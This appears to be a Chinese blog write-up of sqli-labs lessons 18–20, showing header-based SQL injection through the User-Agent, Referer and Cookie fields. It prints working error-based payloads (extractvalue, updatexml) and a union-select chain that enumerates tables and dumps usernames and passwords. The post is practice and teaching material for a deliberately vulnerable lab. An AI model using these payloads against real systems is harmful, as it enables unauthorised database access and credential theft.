sqli-lab————Writeup(18~20)各种头部注入

less18 基于错误的用户代理,头部POST注入

admin
admin
登入成功(进不去重置数据库)
显示如下
在这里插入图片描述
有user agent参数,可能存在注入点
在这里插入图片描述
显示版本号:
在这里插入图片描述
爆库:User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
在这里插入图片描述
库名:
在这里插入图片描述

less19基于头部的RefererPOST报错注入

抓包
admin登陆什么也没有
在referer后加单引号有回显sql语法错误
然后就和 18一样了:Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
爆库:
在这里插入图片描述

less20 基于错误的cookie头部POST注入

admin登陆:
在这里插入图片描述
本关登录成功后用户名会存储在cookie中,且通过该参数执行SQL语句

登录成功之后会设置里面的cookie 当二次刷新的时候 这时候会重新从里面取值弄,并且这次取值没有经过过滤 直接就是注入点 还是使用updatexml的函数进行报错

方法一:
cookie注入:uname=admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #在这里插入图片描述

方法2:
cookie 后加单引号出现报错,说明cookie处存在注入点
在这里插入图片描述

'order by 3 --+ 	  // 回显正常
'order by 4 --+	      // 回显错误
                      //说明行数有3个,即3个显示位

在这里插入图片描述
爆库名:
在这里插入图片描述
之后就是爆表:

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

爆字段:

union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

爆值:

union select 1,2,group_concat(username,0x3a,password) from users--+
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值